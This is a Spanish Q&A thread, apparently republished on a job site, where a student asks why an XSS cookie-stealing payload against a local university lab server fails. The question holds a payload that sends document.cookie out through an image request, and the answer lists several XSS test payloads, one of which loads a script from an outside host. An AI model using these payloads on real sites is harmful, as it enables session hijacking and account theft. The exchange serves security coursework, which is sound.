Empresas
Empleos
  • Sobre nosotros
  • Soluciones
    • Publicación de vacantes
      Publica tu vacante y recibe candidatos calificados en 48h.
    • Evaluación de candidatos
      500+ pruebas técnicas y psicológicas, más anti-fraude.
    • Headhunting
      Búsqueda ejecutiva a la medida de principio a fin.
    • Nómina + EOR
      Dispersión de nómina y EOR en más de 15 países de LATAM.
  • Precios
  • Empleos

0

113
Vistas
Obtener cookie de sesión (xss, carga útil)

Tengo un problema con la obtención de la cookie de sesión. Traté de reescribir el nombre de URL de este http://127.0.0.1:55555 to this http://127.0.0.1:55555/?p=<script>document.write('<img src=http://127.0.0.1:55555/?c='document.cookie+'/>');</script> pero no puedo obtener las cookies de sesión.

Este es un trabajo de proyecto en la universidad, y el profesor hizo dos preguntas al respecto, para ayudarnos a saber qué tiene de malo.

  • ¿Está seguro de que las cargas útiles funcionan y se ejecutan?
  • ¿Está seguro de que debe enviar la solicitud a este servidor local?

Todavía no entiendo cómo debo reescribir la URL.

Así es como se ve toda la página:

ingrese la descripción de la imagen aquí

Y este es el enlace donde está el archivo ZIP: https://drive.google.com/file/d/18VyalmoQdiZ0lKhvEGazfiXSwoLKgp_8/view?usp=sharing

about 4 years ago · Juan Pablo Isaza
1 Respuestas
Responde la pregunta

0

Múltiples cosas podrían estar en juego. Sin tener suficientes detalles y ningún código fuente para trabajar en su pregunta, diría que preste atención a:

  1. Es posible que esté bloqueado por la protección XSS integrada del navegador.
  2. Es posible que no esté canalizando el javascript a ningún campo vulnerable. Sin saber qué en su página usa el valor de ?p= es difícil de determinar. Es posible que necesitemos ver el código fuente completo de la página.
  3. Dependiendo de lo que intente lograr, su javascript para XSS podría ser incorrecto.
  4. Es posible que la cookie que intenta recuperar a través de XSS no exista o esté vacía. XSS se ejecuta localmente en su navegador, no en el servidor del sitio web, por lo que los datos que intenta obtener ya deben existir almacenados en las cookies.

Para probar si el objetivo es realmente vulnerable a XSS, eche un vistazo a algunas de las cargas útiles de XSS a continuación. Son simples, por lo que si realmente hay XSS, es posible que tenga éxito.

https://github.com/payloadbox/xss-payload-list

Algunos ejemplos de buenas cargas útiles XSS para probar:

 <script\x20type="text/javascript">javascript:alert(1);</script> <script>javascript:alert(1)</script\x0D <svg><x><script>alert(1)</x> '';!--"<XSS>=&{()} <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> <IMG SRC="javascript:alert('XSS');"> <IMG SRC=javascript:alert('XSS')> <BODY ONLOAD=alert('XSS')>

Puedes probar cada uno reemplazando el tuyo, así:

 http://127.0.0.1:55555/?p=<BODY ONLOAD=alert('XSS')>

Si alguno de estos funciona, significa que tiene un campo vulnerable XSS y hay algún problema con su código XSS si no recupera la cookie.

Desafortunadamente, no puedo ayudar más hasta que deje más claro cuál es su objetivo y tal vez publique el código fuente del sitio web en cuestión.

about 4 years ago · Juan Pablo Isaza Denunciar
Responde la pregunta
Encuentra empleos remotos

¡Descubre la nueva forma de encontrar empleo!

Top de empleos
Top categorías de empleo
Empresas
Publicar vacante Precios Comercial
Legal
Términos y condiciones Política de privacidad
© 2026 PeakU Inc. All Rights Reserved.
Andres GPT
Recomiéndame algunas ofertas
Necesito ayuda